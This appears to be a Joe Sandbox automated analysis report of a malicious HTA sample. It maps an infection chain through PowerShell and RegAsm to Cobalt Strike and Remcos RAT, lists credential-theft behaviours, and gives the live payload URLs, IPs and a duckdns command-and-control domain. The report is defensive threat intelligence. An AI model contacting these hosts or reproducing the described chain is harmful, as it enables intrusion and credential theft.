                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem4
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt422
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533059 Sample: na.hta Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 63 idabo.duckdns.org 2->63 65 raw.githubusercontent.com 2->65 67 geoplugin.net 2->67 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 93 19 other signatures 2->93 12 mshta.exe 1 2->12         started        signatures3 91 Uses dynamic DNS services 63->91 process4 signatures5 117 Detected Cobalt Strike Beacon 12->117 119 Suspicious powershell command line found 12->119 121 PowerShell case anomaly found 12->121 15 powershell.exe 3 39 12->15         started        process6 dnsIp7 75 192.3.220.40, 49706, 49708, 80 AS-COLOCROSSINGUS United States 15->75 55 C:\...\seethebestpricewithgoodcookiesm.vbS, Unicode 15->55 dropped 57 C:\Users\user\AppData\...\p44lx5ym.cmdline, Unicode 15->57 dropped 77 Detected Cobalt Strike Beacon 15->77 79 Suspicious powershell command line found 15->79 81 Obfuscated command line found 15->81 83 2 other signatures 15->83 20 wscript.exe 1 15->20         started        23 powershell.exe 21 15->23         started        25 csc.exe 3 15->25         started        28 conhost.exe 15->28         started        file8 signatures9 process10 file11 95 Detected Cobalt Strike Beacon 20->95 97 Suspicious powershell command line found 20->97 99 Wscript starts Powershell (via cmd or directly) 20->99 103 3 other signatures 20->103 30 powershell.exe 7 20->30         started        101 Loading BitLocker PowerShell Module 23->101 59 C:\Users\user\AppData\Local\...\p44lx5ym.dll, PE32 25->59 dropped 33 cvtres.exe 1 25->33         started        signatures12 process13 signatures14 123 Detected Cobalt Strike Beacon 30->123 125 Suspicious powershell command line found 30->125 127 Obfuscated command line found 30->127 35 powershell.exe 15 15 30->35         started        39 conhost.exe 30->39         started        process15 dnsIp16 69 raw.githubusercontent.com 185.199.111.133, 443, 49707 FASTLYUS Netherlands 35->69 105 Writes to foreign memory regions 35->105 107 Injects a PE file into a foreign processes 35->107 41 RegAsm.exe 35->41         started        signatures17 process18 dnsIp19 71 idabo.duckdns.org 135.148.195.248, 49714, 49722, 6875 AVAYAUS United States 41->71 73 geoplugin.net 178.237.33.50, 49723, 80 ATOM86-ASATOM86NL Netherlands 41->73 61 C:\ProgramData\remcos\logs.dat, data 41->61 dropped 109 Contains functionality to bypass UAC (CMSTPLUA) 41->109 111 Detected Remcos RAT 41->111 113 Tries to steal Mail credentials (via file registry) 41->113 115 8 other signatures 41->115 46 RegAsm.exe 41->46         started        49 RegAsm.exe 41->49         started        51 RegAsm.exe 41->51         started        53 RegAsm.exe 41->53         started        file20 signatures21 process22 signatures23 129 Tries to steal Instant Messenger accounts or passwords 46->129 131 Tries to steal Mail credentials (via file / registry access) 46->131 133 Tries to harvest and steal browser information (history, passwords, etc) 49->133

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      na.hta27%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      raw.githubusercontent.com0%VirustotalBrowse
                      geoplugin.net0%VirustotalBrowse
                      idabo.duckdns.org2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                      https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                      http://www.imvu.comr0%URL Reputationsafe
                      http://www.imvu.comr0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      http://www.imvu.com0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://go.micros0%URL Reputationsafe
                      http://geoplugin.net/json.gp0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C0%URL Reputationsafe
                      https://aka.ms/pscore6lB0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://login.yahoo.com/config/login0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://www.ebuddy.com0%URL Reputationsafe
                      https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg4%VirustotalBrowse
                      http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF4%VirustotalBrowse
                      https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt0%VirustotalBrowse
                      http://192.3.220.40/0%VirustotalBrowse
                      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                      http://192.3.220.400%VirustotalBrowse
                      https://www.google.com0%VirustotalBrowse
                      https://github.com/Pester/Pester1%VirustotalBrowse
                      http://www.nirsoft.net0%VirustotalBrowse
                      http://geoplugin.net/json.gphy0%VirustotalBrowse
                      http://192.3.220.40/450/RRFCCE.txt4%VirustotalBrowse
                      https://raw.githubusercontent.com0%VirustotalBrowse
                      https://www.google.com/accounts/servicelogin0%VirustotalBrowse
                      http://192.3.220.40/450/seethebe4%VirustotalBrowse
                      idabo.duckdns.org2%VirustotalBrowse
                      http://www.nirsoft.net/0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      raw.githubusercontent.com
                      		185.199.111.133
                      		truetrueunknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalseunknown
                      idabo.duckdns.org
                      		135.148.195.248
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFtrueunknown
                      https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgtrueunknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      		unknown
                      http://192.3.220.40/450/RRFCCE.txttrueunknown
                      idabo.duckdns.orgtrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://192.3.220.40/powershell.exe, 00000001.00000002.2137672850.0000000007BD4000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://geoplugin.net/json.gpurRegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.imvu.comrRegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgtpowershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://192.3.220.40powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004735000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFspowershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://192.3.24:powershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://go.micropowershell.exe, 00000001.00000002.2119899349.00000000056A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.0000000004D36000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFrosoftpowershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://geoplugin.net/json.gphyRegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.nirsoft.netRegAsm.exe, 0000000C.00000002.2251250013.0000000000BF4000.00000004.00000010.00020000.00000000.sdmpfalseunknown
                              http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFPGpowershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://go.microspowershell.exe, 00000003.00000002.2060949985.0000000004DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2279258248.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  		unknown
                                  https://www.google.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                  http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFvupowershell.exe, 00000001.00000002.2118359781.00000000035F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://crl.micropowershell.exe, 00000001.00000002.2137672850.0000000007B8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://raw.githubusercontent.compowershell.exe, 00000009.00000002.2235977032.0000000004608000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.00000000051F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFGmpowershell.exe, 00000001.00000002.2137672850.0000000007AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://192.3.220.40/450/RRFCPpowershell.exe, 00000009.00000002.2235977032.00000000047E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2132026884.0000000006008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2063385323.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.google.com/accounts/serviceloginRegAsm.exefalseunknown
                                        https://login.yahoo.com/config/loginRegAsm.exefalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.nirsoft.net/RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2119899349.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2060949985.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2354881684.0000000005208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2235977032.00000000044B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://192.3.220.40/450/seethebepowershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        http://geoplugin.net/json.gpRr&RegAsm.exe, 0000000B.00000002.4471996980.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.2242699004.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          135.148.195.248
                                          		idabo.duckdns.orgUnited States
                                          		18676AVAYAUStrue
                                          178.237.33.50
                                          		geoplugin.netNetherlands
                                          		8455ATOM86-ASATOM86NLfalse
                                          192.3.220.40
                                          		unknownUnited States
                                          		36352AS-COLOCROSSINGUStrue
                                          185.199.111.133
                                          		raw.githubusercontent.comNetherlands
                                          		54113FASTLYUStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1533059
                                          Start date and time:2024-10-14 11:35:06 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 11m 5s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:17
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:na.hta
                                          Detection:MAL
                                          Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/23@4/4
                                          EGA Information:
                                          • Successful, ratio: 55.6%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 184
                                          • Number of non-executed functions: 321
                                          Cookbook Comments:
                                          • Found application associated with file extension: .hta
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target mshta.exe, PID 3788 because there are no executed function
                                          • Execution Graph export aborted for target powershell.exe, PID 2228 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 3812 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 3840 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          05:35:56API Interceptor106x Sleep call for process: powershell.exe modified
                                          05:36:45API Interceptor7043493x Sleep call for process: RegAsm.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          135.148.195.248037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                            QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                              DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                  gwfe4fo1Sp.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.22755.22546.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                      SecuriteInfo.com.Trojan-Downloader.Office.Doc.20731.18439.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.3511.17688.rtfGet hashmaliciousRemcosBrowse
                                                          QPS366349.xlsGet hashmaliciousRemcosBrowse
                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                                              178.237.33.50DHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              Custom Export Tax Recovery Form.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              192.3.220.40037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 192.3.220.40/450/RRFCCE.txt
                                                              na.htaGet hashmaliciousCobalt StrikeBrowse
                                                              • 192.3.220.40/330/verybestthingswesharedfornew.tIF
                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                              • 192.3.220.40/330/RRCGGH.txt

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              raw.githubusercontent.com037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 185.199.108.133
                                                              SecuriteInfo.com.Win32.MalwareX-gen.4146.6049.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.108.133
                                                              SecuriteInfo.com.Win32.MalwareX-gen.4146.6049.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 185.199.108.133
                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                              • 185.199.108.133
                                                              facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                              • 185.199.110.133
                                                              Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                              • 185.199.108.133
                                                              idabo.duckdns.org037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 135.148.195.248
                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                              • 135.148.195.248
                                                              DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                              • 135.148.195.248
                                                              PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                              • 135.148.195.248
                                                              geoplugin.netDHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              Custom Export Tax Recovery Form.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AVAYAUS037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 135.148.195.248
                                                              na.elfGet hashmaliciousMiraiBrowse
                                                              • 135.150.73.84
                                                              0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 135.64.195.28
                                                              vEOTtk6FeG.elfGet hashmaliciousMiraiBrowse
                                                              • 198.157.41.196
                                                              2NkFwDDoDy.elfGet hashmaliciousMiraiBrowse
                                                              • 135.80.118.106
                                                              na.elfGet hashmaliciousMiraiBrowse
                                                              • 135.98.84.251
                                                              na.elfGet hashmaliciousUnknownBrowse
                                                              • 135.150.97.43
                                                              na.elfGet hashmaliciousMiraiBrowse
                                                              • 135.83.183.50
                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                              • 135.148.195.248
                                                              na.elfGet hashmaliciousMiraiBrowse
                                                              • 135.122.218.20
                                                              FASTLYUShttps://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                                              • 151.101.129.229
                                                              037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 185.199.108.133
                                                              https://emojiparqueacuaticoo.site/NClMD/Get hashmaliciousHTMLPhisherBrowse
                                                              • 151.101.130.137
                                                              https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 151.101.194.137
                                                              Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                              • 199.232.196.209
                                                              https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1Get hashmaliciousUnknownBrowse
                                                              • 151.101.0.114
                                                              https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                              • 151.101.194.137
                                                              https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testofferGet hashmaliciousUnknownBrowse
                                                              • 151.101.65.108
                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                              • 151.101.0.223
                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                              • 151.101.128.223
                                                              AS-COLOCROSSINGUS037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                              • 192.3.220.40
                                                              na.htaGet hashmaliciousCobalt StrikeBrowse
                                                              • 192.3.220.40
                                                              na.elfGet hashmaliciousUnknownBrowse
                                                              • 192.3.165.37
                                                              na.elfGet hashmaliciousUnknownBrowse
                                                              • 192.3.165.37
                                                              sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                              • 198.23.219.104
                                                              na.elfGet hashmaliciousUnknownBrowse
                                                              • 192.3.165.37
                                                              WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                              • 107.173.4.16
                                                              uSE8AyujGn.elfGet hashmaliciousMiraiBrowse
